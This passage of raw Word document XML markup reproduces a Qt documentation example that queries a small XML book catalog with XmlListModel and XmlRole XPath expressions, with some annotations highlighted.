          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wanted</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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&lt;title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt 5 Cadaques</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/title&gt;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&lt;year&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2014</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/year&gt;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&lt;author&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Juergen Bocklage-Ryannel</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/author&gt;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&lt;author&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Johan Thelin</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/author&gt;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&lt;/book&gt;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&lt;book</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Hardcover"</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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&lt;title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++ GUI Programming with Qt 4</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/title&gt;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&lt;year&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2006</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/year&gt;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&lt;author&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jasmin Blanchette</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/author&gt;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&lt;author&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mark Summerfield</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/author&gt;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&lt;/book&gt;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&lt;book</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Paperback"</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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&lt;title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Programming with Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/title&gt;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&lt;year&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2002</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/year&gt;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&lt;author&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Matthias Kalle Dalheimer</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/author&gt;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&lt;/book&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/catalog&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here are some valid XPath expressions for</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1620" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>queries on this document:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="00490E7E"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621" w:history="1">
        <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B046D"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id</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model</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// XmlRole queries will be made on &lt;book&gt; elements</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query</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w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>catalog/book"</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// query the book title</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hyperlink r:id="rId1622" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>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name</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"title"</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query</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"title/string()"</w:t>
      </w:r>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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// query the book's year</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hyperlink r:id="rId1623" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>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name</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"year"</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query</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"year/number()"</w:t>
      </w:r>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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// query the book's type (the '</w:t>
      </w:r>
      <w:r w:rsidRPr="00763692">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@' indicates 'type' is an attribute, not an element</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55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hyperlink r:id="rId1624" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>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name</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"type"</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query</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"@type/string()"</w:t>
      </w:r>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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// query the book's first listed author (</w:t>
      </w:r>
      <w:r w:rsidRPr="00763692">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>note in XPath the first index is 1, not 0</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55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hyperlink r:id="rId1625" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>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name</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"first_author"</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query</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"author[1]/string()"</w:t>
      </w:r>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B046D" w:rsidRPr="002736BE" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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2736BE">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// query the wanted attribute as a boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="002736BE" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
